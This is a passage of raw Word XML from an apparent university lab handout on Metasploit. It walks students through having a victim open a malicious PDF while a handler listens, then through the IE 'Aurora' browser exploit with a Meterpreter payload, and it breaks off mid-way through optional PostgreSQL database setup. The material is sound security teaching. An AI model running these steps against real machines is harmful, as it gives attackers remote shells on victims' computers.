        <w:t>GrayHatHacking.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” file to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/var/www/files/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, and goto your victim’s machine and browse to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://&lt;ip-address-of-kali-box&gt;/files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>GrayHatHacking.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t>Please make sure you re-executed your multi-handler before you proceed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>) and double click on it to open the PDF file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFF5E9" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6989A3EA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now did the GrayHatHacking.pdf work? And what about the Multi Handler, what happened?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606231A8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3217D838" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CE9C2E" w14:textId="77777777" w:rsidR="00305534"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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Attacking the victim’s browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A87A0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In this lab we will exploit the vulnerability in the Internet Explorer "Aurora" Memory Corruption. Use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” command to find the correct module to use. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4241C2B7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD7CC28" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #4.6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> After you found the correct module, you can use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">” command to get further information, links, and details about this exploit. Select the exploit and use the Meterpreter payload for this lab. Configure the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>SRVHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>SRVPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>URIPATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> (set this to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>) for the exploit, and as usual; configure the Meterpreter options too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C00707" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DA71FC" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NOTE: If you are going to use port 80 for the local listener, then you need to stop the Apache service. This can be done like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78538D3C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>sudo systemctl stop apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E3BF2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122E8437" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now start the exploitation, and then check what will happen when the victim opens his browser and tries to navigate to your website! Did you get a Meterpreter shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D92E888" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EF65E0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26240C42" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF6F733" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50763458" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C3057C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B64702" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CECCDA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509598B7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610964D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part #5 – Using the Database under KALI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562B814" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Metasploit has built-in support for the PostgreSQL database system which can help you keep track of your penetration testing progress. Before we start using the MSF database, let’s check what commands it provides us. We can start using the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” or use the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>help database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073CA246" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>help database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A0416" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EBA3B9" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Use the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” to check the database connection status just as the figure below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4C0FC" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="138A5C01" wp14:editId="3DF86070">
            <wp:extent cx="6400800" cy="1943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400800" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C2FAF" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDDFF86" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>As we can see, the database postgresql is selected but we haven’t connected to the database yet. I would recommend you exit msfconsole using the exit command and then proceed with the commands below before getting back in. That way you can automatically have the database connected for you, once you finish running the commands below. If you do not want to do this, then use the YAML file to connect to the database (it will be created after the initialization process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0A54E" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF24AD8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Please make sure you run the following commands before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E3270" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7751B0CD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>$ sudo systemctl start postgresql.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F89892" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>$ sudo systemctl status postgresql.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301C253" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3588C737" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>As seen in the figure below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F5362" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C988CDD" wp14:editId="0360F4DF">
            <wp:extent cx="6400800" cy="1569181"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image8.png" descr="Z:\PSUT\MSc-HTID\3-Labs\Lab6.MSF-CS-Post\h2.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png" descr="Z:\PSUT\MSc-HTID\3-Labs\Lab6.MSF-CS-Post\h2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect t="46" b="46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="1569181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3EBE9B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B22F848" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479BAFEF" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now we need to initialize the database. This could do using the following command:</w:t>
      </w:r>
    </w:p>
